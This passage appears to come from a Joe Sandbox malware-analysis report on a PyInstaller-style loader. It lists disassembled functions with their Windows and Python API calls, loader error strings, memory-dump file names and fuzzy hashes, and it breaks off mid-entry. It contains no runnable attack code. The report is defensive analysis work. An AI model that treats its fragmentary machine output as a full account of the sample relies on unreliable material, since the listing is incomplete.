PyObject_CallFunction, xrefs: 00007FF76D5C5501, 00007FF76D5C551D
PyErr_Fetch, xrefs: 00007FF76D5C52F9, 00007FF76D5C5315
PyObject_CallFunctionObjArgs, xrefs: 00007FF76D5C5529, 00007FF76D5C5545
PyErr_Clear, xrefs: 00007FF76D5C52D1, 00007FF76D5C52ED
PyConfig_SetString, xrefs: 00007FF76D5C5281, 00007FF76D5C529D
Failed to get address for %hs, xrefs: 00007FF76D5C50D9
PyUnicode_DecodeFSDefault, xrefs: 00007FF76D5C56E1, 00007FF76D5C56FD
PyConfig_SetWideStringList, xrefs: 00007FF76D5C52A9, 00007FF76D5C52C5
PyUnicode_Join, xrefs: 00007FF76D5C5759, 00007FF76D5C5775
PyModule_GetDict, xrefs: 00007FF76D5C54D9, 00007FF76D5C54F5
PyConfig_InitIsolatedConfig, xrefs: 00007FF76D5C5209, 00007FF76D5C5225
PySys_GetObject, xrefs: 00007FF76D5C5641, 00007FF76D5C565D
PyStatus_Exception, xrefs: 00007FF76D5C5619, 00007FF76D5C5635
PyMarshal_ReadObjectFromString, xrefs: 00007FF76D5C5489, 00007FF76D5C54A5
PyUnicode_AsUTF8, xrefs: 00007FF76D5C5691, 00007FF76D5C56AD
PyUnicode_Replace, xrefs: 00007FF76D5C5781, 00007FF76D5C579D
PyImport_ExecCodeModule, xrefs: 00007FF76D5C5411, 00007FF76D5C542D
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF76D5C55C9, 00007FF76D5C55E5
PyUnicode_FromString, xrefs: 00007FF76D5C5731, 00007FF76D5C574D
PySys_SetObject, xrefs: 00007FF76D5C5669, 00007FF76D5C5685
PyObject_SetAttrString, xrefs: 00007FF76D5C5579, 00007FF76D5C5595
PyMem_RawFree, xrefs: 00007FF76D5C54B1, 00007FF76D5C54CD

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: AddressProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 190572456-2007157414
Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
Instruction ID: dcd2a43fb98ae11f8d371fea8ef00dc3fa6924d50b2b81194dc738634587f8d1
Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
Instruction Fuzzy Hash: 01129168D2EF03D1FA15FB44A8501B4A7A1AF48792FD4143ACC1E12AA6FF7CF5488670

Function 00007FF76D5C77D0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF76D5C86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF76D5C3FA4,00000000,00007FF76D5C1925), ref: 00007FF76D5C86E9

ExpandEnvironmentStringsW.KERNEL32(?,00007FF76D5C7C97,?,?,FFFFFFFF,00007FF76D5C3834), ref: 00007FF76D5C782C

Part of subcall function 00007FF76D5C26C0: MessageBoxW.USER32 ref: 00007FF76D5C2736

Strings

LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF76D5C7840
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF76D5C789D
\, xrefs: 00007FF76D5C7861
CreateDirectory, xrefs: 00007FF76D5C7974
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF76D5C7803
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF76D5C796D
%.*s, xrefs: 00007FF76D5C790C
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF76D5C78D9

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
Instruction ID: 9408ae2ab19cebbd0c409b4ff9f69d6af695db70648c0e9d199bf38b6d6a3c21
Opcode Fuzzy Hash: 5adf1a7b4f365c991e592d6daa758356e56cb82b092043d5b28c068608273831
Instruction Fuzzy Hash: D9419411E3C643C1FB60BB24D8516BAE261AF98784FC4543ADE4E42E97FE6CE1048B70

Function 00007FF76D5C20F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF76D5C211B
SelectObject.GDI32 ref: 00007FF76D5C2162
DrawTextW.USER32 ref: 00007FF76D5C2185
SelectObject.GDI32 ref: 00007FF76D5C219B
ReleaseDC.USER32 ref: 00007FF76D5C21AB
MoveWindow.USER32 ref: 00007FF76D5C21FB
MoveWindow.USER32 ref: 00007FF76D5C223B
MoveWindow.USER32 ref: 00007FF76D5C228E
MoveWindow.USER32 ref: 00007FF76D5C22D6

Strings

P%, xrefs: 00007FF76D5C216F

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
Instruction ID: 1ced1044051193052f11547bade4a54319b432d052b523778522b2f22fd7e498
Opcode Fuzzy Hash: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
Instruction Fuzzy Hash: 7C51E7266187A1C6D734AF26A4181BAF7A1F798B62F404135EFDE43A85EF3CD045CB20

Function 00007FF76D5D55A0 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 493COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D55E3
_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D59D0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D5C6C

Strings

p, xrefs: 00007FF76D5D570D
:, xrefs: 00007FF76D5D579C
p, xrefs: 00007FF76D5D5695
f, xrefs: 00007FF76D5D5705
-, xrefs: 00007FF76D5D5679

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
Instruction ID: 70342ae1048d00d7bbbc4ff14f84e99d768751412113c11966c0c306380374dd
Opcode Fuzzy Hash: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
Instruction Fuzzy Hash: 66127361A2C243C6FB20BB15D064279E661FB52750FD44136DAAA46EC6FF3CE590CB38

Function 00007FF76D5D02E8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D0328
_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D06F0
_invalid_parameter_noinfo.LIBCMT ref: 00007FF76D5D098F

Strings

f, xrefs: 00007FF76D5D0575
p, xrefs: 00007FF76D5D0432
f, xrefs: 00007FF76D5D03C0
f, xrefs: 00007FF76D5D042A
p, xrefs: 00007FF76D5D03CD

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
Instruction ID: 1b85cf809e91196545d0148d97ab6021bb633926a2feb0ae865539252f420907
Opcode Fuzzy Hash: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
Instruction Fuzzy Hash: 06128361E2C143C6FB20BA1AE0646B9E251FB80754FD44033DAA947DC6EF7DE4809B79

Function 00007FF76D5C1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 111COMMON

Download Yara Rule

Strings

fseek, xrefs: 00007FF76D5C10CC
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF76D5C10F5
fread, xrefs: 00007FF76D5C11D7
Failed to extract %s: failed to open archive file!, xrefs: 00007FF76D5C1097
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF76D5C11D0
malloc, xrefs: 00007FF76D5C10FC
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF76D5C10C5

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: 816554a1a3990d1aa15a165decd0f48e15bed51eddb0c66ae83cc9cee42fa1b7
Instruction ID: 26a90a7a21aa1f065b8da1727ee743bf6e986799b3433e0c9bd60d09c9e32b59
Opcode Fuzzy Hash: 816554a1a3990d1aa15a165decd0f48e15bed51eddb0c66ae83cc9cee42fa1b7
Instruction Fuzzy Hash: 14415C21B2C642C2EA20BB12E8409B6E2A1BB44BC4F844035DD5D47F97FE3CE4458B70

Function 00007FF76D5C1440 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 100COMMON

Download Yara Rule

Strings

fseek, xrefs: 00007FF76D5C14B0
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF76D5C14D9
fread, xrefs: 00007FF76D5C15A1
Failed to extract %s: failed to open archive file!, xrefs: 00007FF76D5C146F
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF76D5C159A
malloc, xrefs: 00007FF76D5C14E0
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF76D5C14A9

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Message
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2030045667-3659356012
Opcode ID: 06f13d1863edb298e36760d8358ffb7f45ae280eb4821161b66b4be0031298b2
Instruction ID: e1090303b6d967d48e7ca4b378c5d5cbbde2134319f78b6b668c17c49713789e
Opcode Fuzzy Hash: 06f13d1863edb298e36760d8358ffb7f45ae280eb4821161b66b4be0031298b2
Instruction Fuzzy Hash: 0E415C21B2C653C1EA20BB15A8505BAE3A0EB48B94F945036DE4E47E97FE3CE5418B20

Function 00007FF76D5CDD28 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF76D5CDD85

Part of subcall function 00007FF76D5CECDC: __GetUnwindTryBlock.LIBCMT ref: 00007FF76D5CED1F
Part of subcall function 00007FF76D5CECDC: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF76D5CED44

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF76D5CDE5D
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF76D5CE0AB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF76D5CE1B8

Strings

csm, xrefs: 00007FF76D5CDE06
csm, xrefs: 00007FF76D5CDE80
csm, xrefs: 00007FF76D5CDD9F

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
Instruction ID: e0d039ff91a23e5512b84333114877244d3d57b5b4fedc486f6a8249595b7d54
Opcode Fuzzy Hash: 9e3578d2910a1de3a92e15cd58e24121979594cfb80c91fc1a566261b89881c5
Instruction Fuzzy Hash: BED16032A2C741C6EB20AB6594413ADB7A0FB55798F500139EE4D97F96EF38E091CB60

Function 00007FF76D5CCFE8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF76D5CD29A,?,?,?,00007FF76D5CCF8C,?,?,?,00007FF76D5CCB89), ref: 00007FF76D5CD06D
GetLastError.KERNEL32(?,?,?,00007FF76D5CD29A,?,?,?,00007FF76D5CCF8C,?,?,?,00007FF76D5CCB89), ref: 00007FF76D5CD07B
LoadLibraryExW.KERNEL32(?,?,?,00007FF76D5CD29A,?,?,?,00007FF76D5CCF8C,?,?,?,00007FF76D5CCB89), ref: 00007FF76D5CD0A5
FreeLibrary.KERNEL32(?,?,?,00007FF76D5CD29A,?,?,?,00007FF76D5CCF8C,?,?,?,00007FF76D5CCB89), ref: 00007FF76D5CD113
GetProcAddress.KERNEL32(?,?,?,00007FF76D5CD29A,?,?,?,00007FF76D5CCF8C,?,?,?,00007FF76D5CCB89), ref: 00007FF76D5CD11F

Strings

api-ms-, xrefs: 00007FF76D5CD08D

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
Instruction ID: 74358a6a3c4ddc56717f919ded47983f850b968a7d66a014d21fbbc1527b9100
Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
Instruction Fuzzy Hash: BB31E82566EB42C1EE15FB1AA400575A394BF88B65FD9053ADD1D57B42FF3CE0428B30

Function 00007FF76D5DA460 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF76D5DA46F
FlsGetValue.KERNEL32 ref: 00007FF76D5DA484
FlsSetValue.KERNEL32 ref: 00007FF76D5DA4A5
FlsSetValue.KERNEL32 ref: 00007FF76D5DA4D2
FlsSetValue.KERNEL32 ref: 00007FF76D5DA4E3
FlsSetValue.KERNEL32 ref: 00007FF76D5DA4F4
SetLastError.KERNEL32 ref: 00007FF76D5DA50F

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 67217a7fc91f5e25160bb9a3b2c8204a3bd01eab0ccbfeeabb81ecf6e12f005c
Instruction ID: cd5f792b410c71dcf3c5fdcf970c33abae0a6236f8d723b2d8bc63fc76eabc0f
Opcode Fuzzy Hash: 67217a7fc91f5e25160bb9a3b2c8204a3bd01eab0ccbfeeabb81ecf6e12f005c
Instruction Fuzzy Hash: 5A216D21A2C642C2FA64B325566597AE1425F587B0FD40634EC3E47EDBFE2CB4404738

Function 00007FF76D5E707C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF76D5E70AD
GetLastError.KERNEL32 ref: 00007FF76D5E70B9
CloseHandle.KERNEL32 ref: 00007FF76D5E70D1
CreateFileW.KERNEL32 ref: 00007FF76D5E70FC
WriteConsoleW.KERNEL32 ref: 00007FF76D5E711B

Strings

CONOUT$, xrefs: 00007FF76D5E70DD

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
Instruction ID: 6c067c9143ad5e9d92f9a18da1a36c34864403abf882b79d6ada97431a994f69
Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
Instruction Fuzzy Hash: 1E118E21A2CB42C6E750BB02E844329A2A1FB8CBE5F840234EE1D87B96EF3CD504C750

Function 00007FF76D5C81F0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,00000000,?,00007FF76D5C39F2), ref: 00007FF76D5C821D
K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF76D5C39F2), ref: 00007FF76D5C827A

Part of subcall function 00007FF76D5C86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF76D5C3FA4,00000000,00007FF76D5C1925), ref: 00007FF76D5C86E9

K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF76D5C39F2), ref: 00007FF76D5C8305
K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF76D5C39F2), ref: 00007FF76D5C8364
FreeLibrary.KERNEL32(?,00000000,?,00007FF76D5C39F2), ref: 00007FF76D5C8375
FreeLibrary.KERNEL32(?,00000000,?,00007FF76D5C39F2), ref: 00007FF76D5C838A

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: bfcefcadc4499c1de8e385cb70073816e38e2b1c8d4e625d2f32d7c46dc3e7cf
Instruction ID: 3a52251cca8e3cb8f25608df04fce95e339491af82c9d27b9614f2b945e6b2aa
Opcode Fuzzy Hash: bfcefcadc4499c1de8e385cb70073816e38e2b1c8d4e625d2f32d7c46dc3e7cf
Instruction Fuzzy Hash: 01418462A2D682C1EB30BB11A9002BAB794FF45BC4F845139DF5D57B86EE3CD501CB60

Function 00007FF76D5DA5D8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF76D5D43FD,?,?,?,?,00007FF76D5D979A,?,?,?,?,00007FF76D5D649F), ref: 00007FF76D5DA5E7
FlsSetValue.KERNEL32(?,?,?,00007FF76D5D43FD,?,?,?,?,00007FF76D5D979A,?,?,?,?,00007FF76D5D649F), ref: 00007FF76D5DA61D
FlsSetValue.KERNEL32(?,?,?,00007FF76D5D43FD,?,?,?,?,00007FF76D5D979A,?,?,?,?,00007FF76D5D649F), ref: 00007FF76D5DA64A
FlsSetValue.KERNEL32(?,?,?,00007FF76D5D43FD,?,?,?,?,00007FF76D5D979A,?,?,?,?,00007FF76D5D649F), ref: 00007FF76D5DA65B
FlsSetValue.KERNEL32(?,?,?,00007FF76D5D43FD,?,?,?,?,00007FF76D5D979A,?,?,?,?,00007FF76D5D649F), ref: 00007FF76D5DA66C
SetLastError.KERNEL32(?,?,?,00007FF76D5D43FD,?,?,?,?,00007FF76D5D979A,?,?,?,?,00007FF76D5D649F), ref: 00007FF76D5DA687

Memory Dump Source

Source File: 00000001.00000002.2075120548.00007FF76D5C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF76D5C0000, based on PE: true

Associated: 00000001.00000002.2074977226.00007FF76D5C0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2075201353.00007FF76D5EB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D5FE000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2076543558.00007FF76D604000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.2077563289.00007FF76D606000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff76d5c0000_Built.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: ef20b32075126869ce53cf62fbcb139ef3f5263cb698c8c2b5617054fce20239
Instruction ID: 02b868a37af12cb0df3e4e5ffc436b19244db83960c4533d725fe938b630bb10
